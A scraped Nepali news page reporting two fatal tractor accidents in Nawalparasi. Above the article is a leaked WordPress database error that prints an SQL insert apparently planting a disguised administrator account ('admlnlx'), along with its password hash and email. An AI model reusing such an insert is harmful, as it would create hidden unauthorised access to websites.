WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSubrRpHc02Wd4nZKWgMBfk3BfNXnx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 02:14:55', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस १०-
नवलपरासीमा भएका छुट्टाछुट्टै दुर्घटनामा दुई जनाको ज्यान गएको छ। नवलपरासीको बेणीमणिपुर ८ भित्री सडक खण्डमा शनिबार राति लु २ त ६३ ७८ नम्बरको ट्याक्टर अनियन्त्रित भई पल्टँदा ट्याक्टरको ट्रलीमा च्यापिएर सोही ठाउँका ट्याक्टरका कामदार वर्ष १४ का भोम बहादुर रानाको मृत्यु भएको छ।
शनिबार राति नै नवलपरासीको राकाचुली गाविस ९ मा लु १ त ५४०३ नम्बरको ट्याक्टरबाट खसेर राकाचुलीका वर्ष ५५ का होम बहादुर लामिछानेको मृत्यु भएको जिल्ला प्रहरी कार्यालय नवलपरासीले जनाएको छ। ट्याक्टरबाट खसेका लामिछानेको सोही ट्याक्टरले किचेर मृत्यु भएको हो।